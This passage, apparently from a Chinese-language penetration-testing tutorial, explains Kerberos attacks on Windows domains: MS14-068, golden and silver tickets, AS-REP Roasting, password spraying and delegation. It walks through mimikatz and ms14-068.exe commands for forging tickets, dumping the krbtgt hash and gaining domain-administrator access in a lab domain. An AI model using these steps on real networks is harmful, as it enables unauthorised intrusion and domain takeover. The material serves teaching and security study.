\uff0c\u5c31\u53ef\u4ee5\u8bbf\u95ee\u670d\u52a1\u4e86\u3002\u6b64\u65f6\u4efb\u4f55\u4e00\u4e2a\u7ecf\u8fc7\u8eab\u4efd\u9a8c\u8bc1\u7684\u7528\u6237\u90fd\u53ef\u4ee5\u8bbf\u95ee\u4efb\u4f55\u670d\u52a1\u3002\u50cf\u8fd9\u6837\u7684\u8ba4\u8bc1\u53ea\u89e3\u51b3\u4e86 "Who am i?" \u7684\u95ee\u9898\uff0c\u800c\u6ca1\u6709\u89e3\u51b3 "What can I do?" \u7684\u95ee\u9898\u3002<\/p>\n \u4e3a\u4e86\u89e3\u51b3\u4e0a\u9762\u7684\u8fd9\u4e2a\u95ee\u9898\uff0c\u5fae\u8f6f\u5f15\u8fdb\u4e86 PAC\u3002\u5373 KDC \u5411\u5ba2\u6237\u7aef Client \u8fd4\u56de AS_REP\u65f6\u63d2\u5165\u4e86 PAC\uff0cPAC \u4e2d\u5305\u542b\u7684\u662f\u7528\u6237\u7684 SID\u3001\u7528\u6237\u6240\u5728\u7684\u7ec4\u7b49\u4e00\u4e9b\u4fe1\u606f\u3002\u5f53\u6700\u540e\u670d\u52a1\u7aef Server \u6536\u5230 Client \u53d1\u6765\u7684 AP_REQ \u8bf7\u6c42\u540e\uff0c\u9996\u5148\u4f1a\u5bf9\u5ba2\u6237\u7aef\u8eab\u4efd\u9a8c\u8bc1\u3002\u901a\u8fc7\u5ba2\u6237\u7aef\u8eab\u4efd\u9a8c\u8bc1\u540e\uff0c\u670d\u52a1\u5668 Server \u4f1a\u62ff\u7740 PAC \u53bb\u8be2\u95ee DC \u8be5\u7528\u6237\u662f\u5426\u6709\u8bbf\u95ee\u6743\u9650\uff0cDC \u62ff\u5230 PAC \u540e\u8fdb\u884c\u89e3\u5bc6\uff0c\u7136\u540e\u901a\u8fc7 PAC \u4e2d\u7684 SID \u5224\u65ad\u7528\u6237\u7684\u7528\u6237\u7ec4\u4fe1\u606f\u3001\u7528\u6237\u6743\u9650\u7b49\u4fe1\u606f\uff0c\u7136\u540e\u5c06\u7ed3\u679c\u8fd4\u56de\u7ed9\u670d\u52a1\u7aef\uff0c\u670d\u52a1\u7aef\u518d\u5c06\u6b64\u4fe1\u606f\u57df\u7528\u6237\u8bf7\u6c42\u7684\u670d\u52a1\u8d44\u6e90\u7684ACL \u8fdb\u884c\u5bf9\u6bd4\uff0c\u6700\u540e\u51b3\u5b9a\u662f\u5426\u7ed9\u7528\u6237\u63d0\u4f9b\u76f8\u5173\u7684\u670d\u52a1\u3002\u4f46\u662f\u5728\u6709\u4e9b\u670d\u52a1\u4e2d\u5e76\u6ca1\u6709\u9a8c\u8bc1 PAC \u8fd9\u4e00\u6b65\uff0c\u8fd9\u4e5f\u662f\u767d\u94f6\u7968\u636e\u80fd\u6210\u529f\u7684\u524d\u63d0\uff0c\u56e0\u4e3a\u5c31\u7b97\u62e5\u6709\u7528\u6237\u7684 Hash\uff0c\u53ef\u4ee5\u4f2a\u9020 TGS\uff0c\u4f46\u662f\u4e5f\u4e0d\u80fd\u5236\u4f5c PAC\uff0cPAC \u5f53\u7136\u4e5f\u9a8c\u8bc1\u4e0d\u6210\u529f\uff0c\u4f46\u662f\u6709\u4e9b\u670d\u52a1\u4e0d\u53bb\u9a8c\u8bc1 PAC\uff0c\u8fd9\u662f\u767d\u94f6\u7968\u636e\u6210\u529f\u7684\u524d\u63d0<\/p>\n Kerberos \u8ba4\u8bc1\u5e76\u4e0d\u662f\u5929\u8863\u65e0\u7f1d\u7684\uff0c\u8fd9\u5176\u4e2d\u4e5f\u4f1a\u6709\u5404\u79cd\u6f0f\u6d1e\u80fd\u591f\u88ab\u6211\u4eec\u5229\u7528\uff0c\u6bd4\u5982\u6211\u4eec\u5e38\u8bf4\u7684 MS14-068\u3001\u9ec4\u91d1\u7968\u636e\u3001\u767d\u94f6\u7968\u636e\u7b49\u5c31\u662f\u57fa\u4e8e Kerberos \u534f\u8bae\u8fdb\u884c\u653b\u51fb\u7684\u3002\u4e0b\u9762\u6211\u4eec\u4fbf\u6765\u5927\u81f4\u4ecb\u7ecd\u4e00\u4e0b Kerberos \u8ba4\u8bc1\u4e2d\u7684\u76f8\u5173\u5b89\u5168\u95ee\u9898<\/p>\n \u5728 Windows \u7684 kerberos \u8ba4\u8bc1\u8fc7\u7a0b\u4e2d\uff0cClient \u5c06\u81ea\u5df1\u7684\u4fe1\u606f\u53d1\u9001\u7ed9 KDC\uff0c\u7136\u540e KDC\u4f7f\u7528 Krbtgt \u7528\u6237\u7684 NTLM-Hash \u4f5c\u4e3a\u5bc6\u94a5\u8fdb\u884c\u52a0\u5bc6\uff0c\u751f\u6210 TGT\u3002\u90a3\u4e48\u5982\u679c\u83b7\u53d6\u5230\u4e86Krbtgt \u7684 NTLM-Hash \u503c\uff0c\u4e0d\u5c31\u53ef\u4ee5\u4f2a\u9020\u4efb\u610f\u7684 TGT \u4e86\u5417\u3002\u56e0\u4e3a Krbtgt \u53ea\u6709\u57df\u63a7\u5236\u5668\u4e0a\u9762\u624d\u6709\uff0c\u6240\u4ee5\u4f7f\u7528\u9ec4\u91d1\u51ed\u636e\u610f\u5473\u7740\u4f60\u4e4b\u524d\u62ff\u5230\u8fc7\u57df\u63a7\u5236\u5668\u7684\u6743\u9650\uff0c\u9ec4\u91d1\u51ed\u636e\u53ef\u4ee5\u7406\u89e3\u4e3a\u4e00\u4e2a\u540e\u95e8\u3002<\/p>\n \u5148\u5047\u8bbe\u8fd9\u4e48\u4e00\u79cd\u60c5\u51b5\uff0c\u539f\u5148\u5df2\u62ff\u5230\u7684\u57df\u5185\u6240\u6709\u7684\u8d26\u6237 Hash\uff0c\u5305\u62ec Krbtgt \u8fd9\u4e2a\u8d26\u6237\uff0c\u7531\u4e8e\u6709\u4e9b\u539f\u56e0\u5bfc\u81f4\u4f60\u5bf9\u57df\u7ba1\u6743\u9650\u4e22\u5931\uff0c\u4f46\u597d\u5728\u4f60\u8fd8\u6709\u4e00\u4e2a\u666e\u901a\u57df\u7528\u6237\u6743\u9650\uff0c\u78b0\u5de7\u7ba1\u7406\u5458\u5728\u57df\u5185\u52a0\u56fa\u65f6\u5fd8\u8bb0\u91cd\u7f6e Krbtgt \u5bc6\u7801\uff0c\u57fa\u4e8e\u6b64\u6761\u4ef6\uff0c\u6211\u4eec\u8fd8\u80fd\u5229\u7528\u8be5\u7968\u636e\u91cd\u65b0\u83b7\u5f97\u57df\u7ba1\u7406\u5458\u6743\u9650\u3002\u5229\u7528 Krbtgt \u7684 Hash \u503c\u53ef\u4ee5\u4f2a\u9020\u751f\u6210\u4efb\u610f\u7684 TGT\uff0c\u80fd\u591f\u7ed5\u8fc7\u5bf9\u4efb\u610f\u7528\u6237\u7684\u8d26\u53f7\u7b56\u7565\uff0c\u8ba9\u7528\u6237\u6210\u4e3a\u4efb\u610f\u7ec4\u7684\u6210\u5458\uff0c\u53ef\u7528\u4e8e Kerberos \u8ba4\u8bc1\u7684\u4efb\u4f55\u670d\u52a1\u3002<\/p>\n \u767d\u94f6\u7968\u636e\u4e0d\u540c\u4e8e\u9ec4\u91d1\u7968\u636e\uff0c\u767d\u94f6\u7968\u636e\u7684\u5229\u7528\u8fc7\u7a0b\u662f\u4f2a\u9020 TGS\uff0c\u901a\u8fc7\u5df2\u77e5\u7684\u6388\u6743\u670d\u52a1\u5bc6\u7801\u751f\u6210\u4e00\u5f20\u53ef\u4ee5\u8bbf\u95ee\u8be5\u670d\u52a1\u7684 TGT\u3002\u56e0\u4e3a\u5728\u7968\u636e\u751f\u6210\u8fc7\u7a0b\u4e2d\u4e0d\u9700\u8981\u4f7f\u7528KDC\uff0c\u6240\u4ee5\u53ef\u4ee5\u7ed5\u8fc7\u57df\u63a7\u5236\u5668\uff0c\u5f88\u5c11\u7559\u4e0b\u65e5\u5fd7\u3002\u800c\u9ec4\u91d1\u7968\u636e\u5728\u5229\u7528\u8fc7\u7a0b\u4e2d\u7531 KDC\u9881\u53d1 TGT\uff0c\u5e76\u4e14\u5728\u751f\u6210\u4f2a\u9020\u7684 TGT \u5f97 20 \u5206\u949f\u5185\uff0cTGS \u4e0d\u4f1a\u5bf9\u8be5 TGT \u7684\u771f\u4f2a\u8fdb\u884c\u6548\u9a8c\u3002<\/p>\n \u767d\u94f6\u7968\u636e\u4f9d\u8d56\u4e8e\u670d\u52a1\u8d26\u53f7\u7684\u5bc6\u7801\u6563\u5217\u503c\uff0c\u8fd9\u4e0d\u540c\u4e8e\u9ec4\u91d1\u7968\u636e\u5229\u7528\u9700\u8981\u4f7f\u7528 Krbtgt\u8d26\u53f7\u7684\u5bc6\u7801\u54c8\u5e0c\u503c\uff0c\u56e0\u6b64\u66f4\u52a0\u9690\u853d\u3002<\/p>\n \u8fd9\u91cc\u4fbf\u7528\u5230\u4e86\u6211\u4eec\u4e4b\u524d\u6240\u8bb2\u5230\u7684 PAC \u8fd9\u4e2a\u4e1c\u897f\uff0cPAC \u662f\u7528\u6765\u9a8c\u8bc1 Client \u7684\u8bbf\u95ee\u6743\u9650\u7684\uff0c\u5b83\u4f1a\u88ab\u653e\u5728 TGT \u91cc\u53d1\u9001\u7ed9 Client\uff0c\u7136\u540e\u7531 Client \u53d1\u9001\u7ed9 TGS\u3002\u4f46\u4e5f\u6070\u6070\u662f\u8fd9\u4e2a PAC \u9020\u6210\u4e86 MS14-068 \u8fd9\u4e2a\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u662f\u4f4d\u4e8e kdcsvc.dll \u57df\u63a7\u5236\u5668\u7684\u5bc6\u94a5\u5206\u53d1\u4e2d \u5fc3\uff08KDC\uff09\u670d\u52a1\u4e2d\u7684 Windows \u6f0f\u6d1e\uff0c\u5b83\u5141\u8bb8\u7ecf\u8fc7\u8eab\u4efd\u9a8c\u8bc1\u7684\u7528\u6237\u5728\u5176\u83b7\u5f97\u7684\u7968\u8bc1 TGT \u4e2d\u63d2\u5165\u4efb\u610f\u7684 PAC \u3002\u666e\u901a\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u5448\u73b0\u5177\u6709\u6539\u53d8\u4e86 PAC \u7684 TGT \u6765\u4f2a\u9020\u7968\u636e\u83b7\u5f97\u7ba1\u7406\u5458\u6743\u9650<\/p>\n \u5728\u5b9e\u9645\u6e17\u900f\u4e2d\uff0c\u8bb8\u591a\u6e17\u900f\u6d4b\u8bd5\u4eba\u5458\u548c\u653b\u51fb\u8005\u901a\u5e38\u90fd\u4f1a\u4f7f\u7528\u4e00\u79cd\u88ab\u79f0\u4e3a \u201c\u5bc6\u7801\u55b7\u6d12\u201d\uff08Password Spraying\uff09\u7684\u6280\u672f\u6765\u8fdb\u884c\u6d4b\u8bd5\u548c\u653b\u51fb\u3002\u5bf9\u5bc6\u7801\u8fdb\u884c\u55b7\u6d12\u5f0f\u7684\u653b\u51fb\uff0c\u8fd9\u4e2a\u53eb\u6cd5\u5f88\u5f62\u8c61\uff0c\u56e0\u4e3a\u5b83\u5c5e\u4e8e\u81ea\u52a8\u5316\u5bc6\u7801\u731c\u6d4b\u7684\u4e00\u79cd\u3002\u8fd9\u79cd\u9488\u5bf9\u6240\u6709\u7528\u6237\u7684\u81ea\u52a8\u5bc6\u7801\u731c\u6d4b\u901a\u5e38\u662f\u4e3a\u4e86\u907f\u514d\u5e10\u6237\u88ab\u9501\u5b9a\uff0c\u56e0\u4e3a\u9488\u5bf9\u540c\u4e00\u4e2a\u7528\u6237\u7684\u8fde\u7eed\u5bc6\u7801\u731c\u6d4b\u4f1a\u5bfc\u81f4\u5e10\u6237\u88ab\u9501\u5b9a\u3002\u6240\u4ee5\u53ea\u6709\u5bf9\u6240\u6709\u7528\u6237\u540c\u65f6\u6267\u884c\u7279\u5b9a\u7684\u5bc6\u7801\u767b\u5f55\u5c1d\u8bd5\uff0c\u624d\u80fd\u589e\u52a0\u7834\u89e3\u7684\u6982\u7387\uff0c\u6d88\u9664\u5e10\u6237\u88ab\u9501\u5b9a\u7684\u6982\u7387\u3002\u666e\u901a\u7684\u7206\u7834\u5c31\u662f\u7528\u6237\u540d\u56fa\u5b9a\uff0c\u7206\u7834\u5bc6\u7801\uff0c\u4f46\u662f\u5bc6\u7801\u55b7\u6d12\uff0c\u662f\u7528\u56fa\u5b9a\u7684\u5bc6\u7801\u53bb\u8dd1\u7528\u6237\u540d<\/p>\n \u6211\u4eec\u524d\u6587\u8bf4\u8fc7\uff0cASREQ & ASREP \u8ba4\u8bc1\u7684\u8fc7\u7a0b\u662f Kerberos \u8eab\u4efd\u8ba4\u8bc1\u7684\u7b2c\u4e00\u6b65\uff0c\u8be5\u8fc7\u7a0b\u53c8\u88ab\u79f0\u4e3a\u9884\u8eab\u4efd\u9a8c\u8bc1\u3002\u9884\u8eab\u4efd\u9a8c\u8bc1\u4e3b\u8981\u662f\u4e3a\u4e86\u9632\u6b62\u5bc6\u7801\u8131\u673a\u7206\u7834\u3002\u800c\u5982\u679c\u57df\u7528\u6237\u8bbe\u7f6e\u4e86\u9009\u9879 "Do not require Kerberos preauthentication"\uff08\u8be5\u9009\u9879\u9ed8\u8ba4\u6ca1\u6709\u5f00\u542f\uff09\u5173\u95ed\u4e86\u9884\u8eab\u4efd\u9a8c\u8bc1\u7684\u8bdd\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528\u6307\u5b9a\u7684\u7528\u6237\u53bb\u8bf7\u6c42\u7968\u636e\uff0c\u5411\u57df\u63a7\u5236\u5668\u53d1\u9001 AS_REQ \u8bf7\u6c42\uff0c\u6b64\u65f6\u57df\u63a7\u4f1a\u4e0d\u4f5c\u4efb\u4f55\u9a8c\u8bc1\u4fbf\u5c06 TGT \u7968\u636e\u548c\u52a0\u5bc6\u7684Session-key \u7b49\u4fe1\u606f\u8fd4\u56de\u3002\u56e0\u6b64\u653b\u51fb\u8005\u5c31\u53ef\u4ee5\u5bf9\u83b7\u53d6\u5230\u7684\u52a0\u5bc6 Session-key \u8fdb\u884c\u79bb\u7ebf\u7834\u89e3\uff0c\u5982\u679c\u7206\u7834\u6210\u529f\uff0c\u5c31\u80fd\u5f97\u5230\u8be5\u6307\u5b9a\u7528\u6237\u7684\u660e\u6587\u5bc6\u7801\u3002\u8fd9\u79cd\u653b\u51fb\u65b9\u5f0f\u88ab\u79f0\u4f5c AS-REP Roasting \u653b\u51fb<\/p>\n \u8fd9\u91cc\u4ecb\u7ecd\u57df\u5185\u5e38\u7528\u7684\u4e24\u79cd\u653b\u51fb\u65b9\u5f0f\uff1a\u9ec4\u91d1\u7968\u636e Golden ticket\u3001\u767d\u94f6\u7968\u636e SILVER TICKET<\/p>\n \u539f\u7406<\/strong><\/p>\n \u5728 Kerberos \u8ba4\u8bc1\u4e2d,Client \u901a\u8fc7 AS(\u8eab\u4efd\u8ba4\u8bc1\u670d\u52a1)\u8ba4\u8bc1\u540e,AS \u4f1a\u7ed9 Client \u4e00\u4e2aLogon Session Key \u548c TGT,\u800c Logon Session Key \u5e76\u4e0d\u4f1a\u4fdd\u5b58\u5728 KDC \u4e2d\uff0ckrbtgt \u7684NTLM Hash \u53c8\u662f\u56fa\u5b9a\u7684,\u6240\u4ee5\u53ea\u8981\u5f97\u5230 krbtgt \u7684 NTLM Hash\uff0c\u5c31\u53ef\u4ee5\u4f2a\u9020 TGT \u548cLogon Session Key \u6765\u8fdb\u5165\u4e0b\u4e00\u6b65 Client \u4e0e TGS \u7684\u4ea4\u4e92\u3002\u800c\u5df2\u6709\u4e86\u91d1\u7968\u540e,\u5c31\u8df3\u8fc7AS \u9a8c\u8bc1,\u4e0d\u7528\u9a8c\u8bc1\u8d26\u6237\u548c\u5bc6\u7801,\u6240\u4ee5\u4e5f\u4e0d\u62c5\u5fc3\u57df\u7ba1\u5bc6\u7801\u4fee\u6539\u3002<\/p>\n \u7279\u70b9<\/strong><\/p>\n \u4e0d\u9700\u8981\u4e0e AS \u8fdb\u884c\u4ea4\u4e92\uff0c\u9700\u8981\u7528\u6237 krbtgt \u7684 Hash<\/p>\n \u5177\u4f53\u64cd\u4f5c\u4ecb\u7ecd<\/p>\n \u6211\u4eec\u73b0\u5728\u4ee5\u4e00\u4e2a\u672c\u5730 administrator \u7528\u6237\u767b\u5f55\u57df\u5185\u7684\u4e00\u4e2a\u4e3b\u673a\u4e2d\u3002<\/p>\n \u901a\u8fc7\u547d\u4ee4\uff1anet config workstation,\u53ef\u77e5\u57df\u540d\u4e3a\uff1amoonhack \u548c\u5176\u4ed6\u4fe1\u606f<\/p>\n \u901a\u8fc7\u547d\u4ee4\uff1anltest \/dsgetdc:\u57df\u540d,\u53ef\u77e5 DC \u4e3b\u673a\u540d\u4e3a\uff1amoonhack<\/p>\n \u4e0a\u4f20 mimikatz,\u4ee5\u7ba1\u7406\u5458\u6743\u9650\u8fd0\u884c CMD,\u518d\u53bb\u6267\u884c mimikatz\uff1a<\/p>\n \u8fd9\u91cc\u5229\u7528 MS14-068 \u6765\u63d0\u6743,\u5148\u68c0\u67e5\u4e0b\u662f\u5426\u6709 MS14-068, CVE \u7f16\u53f7 CVE-2014-6324,\u8865\u4e01\u4e3a 3011780 \uff1a systeminfo |find "3011780",\u5982\u679c\u8fd4\u56de\u4e3a\u7a7a\u5c31\u8bf4\u660e\u6ca1\u6709\u6253\u8865\u4e01,\u5b58\u5728\u6f0f\u6d1e,\u9700\u8981\u6ce8\u610f\u7684\u662f\u57df\u5185\u666e\u901a\u7528\u6237\u63d0\u6743\u6210\u529f\u540e\u662f\u6709\u65f6\u6548\u6027\u7684<\/p>\n \u8bbf\u95ee 08server-ad \u5931\u8d25 \u63d0\u793a\u62d2\u7edd\u8bbf\u95ee<\/p>\n \u4e0a\u4f20 mimikatz \u548c MS14-068 \u63d0\u6743\u5de5\u5177\uff0cwhoami \/user \u6216\u8005 whoami\/all \u67e5\u770b test<\/p>\n \u7528\u6237\u7684 suid<\/p>\n \u4f7f\u7528 MS14-068 \u4f2a\u9020\u7968\u636e\uff1a<\/p>\n \u6267\u884c\u547d\u4ee4\uff1ams14-068.exe -u test@moonhack.com -p 123456 -s S-1-5-21-3439616436-2844000184-3841763578-1105 -d 08server-ad.moonhack.com\uff0c\u4f1a\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u751f\u6210\u4e00\u4e2a\u51ed\u8bc1\u3002<\/p>\n \u4f7f\u7528\u65b9\u6cd5\uff1a<\/p>\n ms14-068.exe -u \u57df\u6210\u5458\u540d@\u57df\u540d -p \u57df\u6210\u5458\u5bc6\u7801 -s \u57df\u6210\u5458 sid -d \u57df\u63a7\u5236\u5668\u5730\u5740 \u4f7f\u7528 mimikatz \u6e05\u7a7a\u4e4b\u524d\u7f13\u5b58\u7684\u51ed\u8bc1\uff0c\u5bfc\u5165\u4f2a\u9020\u7684\u51ed\u8bc1\uff1a<\/p>\n mimikatz # kerberos::purge \/\/\u6e05\u7a7a\u7968\u636e<\/p>\n mimikatz # kerberos::ptc \u7968\u636e\u6587\u4ef6\u5730\u5740<\/p>\n \u518d\u8f93\u5165 dir \u00008server-ad.moonhack.comc$\uff0c\u53d1\u73b0\u8bbf\u95ee\u6210\u529f\uff0c\u73b0\u5728\u6211\u4eec\u6709\u57df\u7ba1\u7684\u6743\u9650:<\/p>\n \u6dfb\u52a0\u57df\u7ba1\u8d26\u53f7\u5bc6\u7801<\/p>\n \u4f2a\u9020\u91d1\u7968\u7684\u6240\u9700\u6761\u4ef6<\/p>\n 1\u3001\u57df\u540d\u79f0<\/p>\n 2\u3001\u57df\u7684 SID \u503c<\/p>\n 3\u3001\u57df\u7684 KRBTGT \u8d26\u53f7\u7684 HASH<\/p>\n 4\u3001\u4f2a\u9020\u4efb\u610f\u7528\u6237\u540d<\/p>\n \u767b\u5f55\u57df\u7ba1\u7528\u6237\uff0c\u6267\u884c whoami \u53ef\u4ee5\u770b\u5230\u662f administrator \u7528\u6237<\/p>\n \u4f7f\u7528\u4e00\u4e0b\u547d\u4ee4\u5bfc\u51fa\u7528\u6237 krbtgt \u7684 hash\uff1a<\/p>\n \u5229\u7528 mimikatz \u751f\u6210\u91d1\u7968\u751f\u6210.kirbi \u6587\u4ef6\u5e76\u4fdd\u5b58<\/p>\n \/admin\uff1a\u4f2a\u9020\u7684\u7528\u6237\u540d<\/p>\n \/domain\uff1a\u57df\u540d\u79f0<\/p>\n \/sid\uff1aSID \u503c\uff0c\u6ce8\u610f\u662f\u53bb\u6389\u6700\u540e\u4e00\u4e2a-\u540e\u9762\u7684\u503c<\/p>\n \/krbtgt\uff1akrbtgt \u7684 HASH \u503c<\/p>\n \/ticket\uff1a\u751f\u6210\u7684\u7968\u636e\u540d\u79f0 \/\/\u4e0d\u662f\u5199\u5165\u5185\u5b58\u4e2d\u7684\u547d\u4ee4<\/p>\n \u767b\u5f55\u57df\u5185\u666e\u901a\u7528\u6237\uff0c\u901a\u8fc7 mimikatz \u4e2d\u7684 kerberos::ptt \u529f\u80fd\u5c06 ticket.kirbi \u5bfc\u5165\u5185\u5b58\u4e2d\u3002<\/p>\n \u5bfc\u5165\u7968\u636e\u4e4b\u524d\u8bbf\u95ee\u57df\u63a7<\/p>\n \u6ce8\u5165\u5185\u5b58\u4e2d\u53ef\u4ee5\u518d\u6765\u8bbf\u95ee dc \u53ef\u4ee5\u6210\u529f<\/p>\n \u539f\u7406<\/strong><\/p>\n \u5982\u679c\u8bf4\u9ec4\u91d1\u7968\u636e\u662f\u4f2a\u9020\u7684 TGT,\u90a3\u4e48\u767d\u94f6\u7968\u636e\u5c31\u662f\u4f2a\u9020\u7684 ST\u3002\u5728 Kerberos \u8ba4\u8bc1\u7684\u7b2c\u4e09\u90e8\uff0cClient \u5e26\u7740 ST \u548c Authenticator3 \u5411 Server \u4e0a\u7684\u67d0\u4e2a\u670d\u52a1\u8fdb\u884c\u8bf7\u6c42\uff0cServer \u63a5\u6536\u5230 Client \u7684\u8bf7\u6c42\u4e4b\u540e,\u901a\u8fc7\u81ea\u5df1\u7684 Master Key \u89e3\u5bc6 ST,\u4ece\u800c\u83b7\u5f97 Session Key\u3002\u901a\u8fc7 Session Key \u89e3\u5bc6 Authenticator3,\u8fdb\u800c\u9a8c\u8bc1\u5bf9\u65b9\u7684\u8eab\u4efd,<\/p>\n \u9a8c\u8bc1\u6210\u529f\u5c31\u8ba9 Client \u8bbf\u95ee server \u4e0a\u7684\u6307\u5b9a\u670d\u52a1\u4e86\u3002\u6240\u4ee5\u6211\u4eec\u53ea\u9700\u8981\u77e5\u9053 Server \u7528\u6237\u7684 Hash \u5c31\u53ef\u4ee5\u4f2a\u9020\u51fa\u4e00\u4e2a ST,\u4e14\u4e0d\u4f1a\u7ecf\u8fc7 KDC,\u4f46\u662f\u4f2a\u9020\u7684\u95e8\u7968\u53ea\u5bf9\u90e8\u5206\u670d\u52a1\u8d77\u4f5c\u7528<\/p>\n \u7279\u70b9<\/strong><\/p>\n 1.\u4e0d\u9700\u8981\u4e0e KDC \u8fdb\u884c\u4ea4\u4e92<\/p>\n 2.\u9700\u8981 server \u7684 NTLM hash<\/p>\n \u5177\u4f53\u64cd\u4f5c\u4ecb\u7ecd<\/p>\n \u767b\u5f55\u4e0a\u9762\u521b\u5efa\u7684\u57df\u7ba1\u7528\u6237\uff0c\u7528\u7ba1\u7406\u5458\u6743\u9650\u6253\u5f00 CMD\uff0ccd \u5230 mimikatz \u5b58\u653e\u7684\u76ee\u5f55\uff0c\u53bb\u6267\u884c mimikatz \u7684\u547d\u4ee4\uff0c\u5f97\u5230 SID \u548c NTLM<\/p>\n \u5148\u4f7f\u7528 mimikatz \u6e05\u7a7a\u7968\u636e\uff0c\u518d\u5bfc\u5165\u4f2a\u9020\u7684\u7968\u636e,\u5177\u4f53\u4f2a\u9020\u7968\u636e\u7684\u547d\u4ee4<\/p>\n \u4f7f\u7528\u65b9\u6cd5\uff1a<\/p>\n kerberos::golden \/domain:<\u57df\u540d> \/sid:<\u57df SID> \/target:<\u76ee\u6807\u670d\u52a1\u5668\u4e3b\u673a\u540d>\/service:<\u670d\u52a1\u7c7b\u578b> \/rc4: \u5176\u4e2d\u7684\u7528\u6237\u540d\u53ef\u4ee5\u968f\u4fbf\u5199<\/p>\n \u670d\u52a1\u7c7b\u578b\u53ef\u4ee5\u4ece\u4ee5\u4e0b\u5185\u5bb9\u4e2d\u6765\u8fdb\u884c\u9009\u62e9\uff0c\u56e0\u4e3a\u6211\u4eec\u6ca1\u6709 TGT \u53bb\u4e0d\u65ad\u7533\u8bf7 ticket\uff0c<\/p>\n \u6240\u4ee5\u53ea\u80fd\u9488\u5bf9\u67d0\u4e00\u4e9b\u670d\u52a1\u6765\u8fdb\u884c\u4f2a\u9020<\/p>\n \u73b0\u5728\u5df2\u7ecf\u6709\u57df\u7ba1\u7684\u6743\u9650\u4e86<\/p>\n kekeo \u5236\u4f5c\u73af\u5883\u94f6\u7968<\/p>\n \u91d1\u7968\uff1a\u4f2a\u9020\u7684 TGT\uff0c\u53ef\u4ee5\u83b7\u53d6\u4efb\u610f Kerberos \u7684\u8bbf\u95ee\u6743\u9650<\/p>\n \u94f6\u7968\uff1a\u4f2a\u9020\u7684 ST\uff0c\u53ea\u80fd\u8bbf\u95ee\u6307\u5b9a\u7684\u670d\u52a1\uff0c\u5982 CIFS<\/p>\n \u91d1\u7968\uff1a\u540c KDC \u4ea4\u4e92\uff0c\u4f46\u4e0d\u540c AS \u4ea4\u4e92<\/p>\n \u94f6\u7968\uff1a\u4e0d\u540c KDC \u4ea4\u4e92\uff0c\u76f4\u63a5\u8bbf\u95ee Server<\/p>\n \u91d1\u7968\uff1a\u7531 krbtgt NTLM Hash \u52a0\u5bc6<\/p>\n \u94f6\u7968\uff1a\u7531\u670d\u52a1\u8d26\u53f7 NTLM Hash \u52a0\u5bc6<\/p>\n \u57df\u59d4\u6d3e\u662f\u6307\u5c06\u57df\u5185\u7528\u6237\u7684\u6743\u9650\u59d4\u6d3e\u7ed9\u670d\u52a1\u8d26\u53f7\uff0c\u4f7f\u5f97\u670d\u52a1\u8d26\u53f7\u80fd\u4ee5\u7528\u6237\u7684\u6743\u9650\u5728\u57df\u5185\u5c55\u5f00\u6d3b\u52a8\u3002<\/p>\n \u7b80\u8a00\u4e4b\uff1a\u5f53A\u8bbf\u95ee\u670d\u52a1B\u65f6\uff0c\u670d\u52a1B\u62ff\u7740A\u7528\u6237\u7684\u51ed\u8bc1\u53bb\u8bbf\u95ee\u670d\u52a1C\uff0c\u8fd9\u4e2a\u8fc7\u7a0b\u79f0\u4e3a\u59d4\u6d3e\u3002<\/strong><\/p>\n \u59d4\u6d3e\u653b\u51fb\u5206\u4e3a\u4e09\u79cd\u653b\u51fb\u624b\u6bb5<\/p>\n \u975e\u7ea6\u675f\u59d4\u6d3e \u653b\u51fb<\/p>\n \u7ea6\u675f\u59d4\u6d3e\u653b\u51fb<\/p>\n \u8d44\u6e90\u59d4\u6d3e\u653b\u51fb<\/p>\n \u5728\u57df\u5185\u53ea\u6709\u4e3b\u673a\u8d26\u53f7\u548c\u670d\u52a1\u8d26\u53f7\u624d\u6709\u59d4\u6d3e\u5c5e\u6027 <\/p>\n \u4e3b\u673a\u8d26\u53f7\uff1a\u6d3b\u52a8\u76ee\u5f55\u4e2d\u7684computers\u7ec4\u5185\u7684\u8ba1\u7b97\u673a\uff0c\u4e5f\u88ab\u79f0\u4e3a\u673a\u5668\u8d26\u53f7\u3002 <\/p>\n \u670d\u52a1\u8d26\u53f7\uff1a\u57df\u5185\u7528\u6237\u7684\u4e00\u79cd\u7c7b\u578b\uff0c\u662f\u670d\u52a1\u5668\u8fd0\u884c\u670d\u52a1\u65f6\u6240\u7528\u7684\u8d26\u53f7\uff0c\u5c06\u670d\u52a1\u8fd0\u884c\u8d77\u6765\u52a0\u5165\u57df\u5185\uff0c\u6bd4\u5982\uff1aSQLServer,MYSQL\u7b49\uff1b\u57df\u7528\u6237\u901a\u8fc7\u6ce8\u518cSPN\u4e5f\u80fd\u6210\u4e3a\u670d\u52a1\u8d26\u53f7<\/p>\n user\u8bbf\u95eeserverA\uff0c\u4e8e\u662f\u5411DC\u53d1\u8d77\u8ba4\u8bc1\uff0cDC\u4f1a\u68c0\u67e5serverA\u7684\u673a\u5668\u8d26\u53f7\u7684\u5c5e\u6027\uff0c\u5982\u679c\u662f\u975e\u7ea6\u675f\u59d4\u6d3e\u7684\u8bdd\uff0c\u4f1a\u628a\u7528\u6237\u7684TGT\u653e\u5728ST\u7968\u636e\u4e2d\u5e76\u4e00\u8d77\u53d1\u9001\u7ed9serverA \u8fd9\u6837serverA\u5728\u9a8c\u8bc1ST\u7968\u636e\u7684\u540c\u65f6\u4e5f\u83b7\u53d6\u5230\u4e86\u7528\u6237\u7684TGT\uff0c\u5e76\u628aTGT\u50a8\u5b58\u5728\u81ea\u5df1\u7684lsass\u8fdb\u7a0b\u4e2d\u4ee5\u5907\u4e0b\u6b21\u91cd\u7528\uff0c\u4ece\u800cserverA\u5c31\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2aTGT\uff0c\u6765\u6a21\u62df\u8fd9\u4e2auser\u8bbf\u95ee\u4efb\u4f55\u670d\u52a1\u3002<\/p>\n 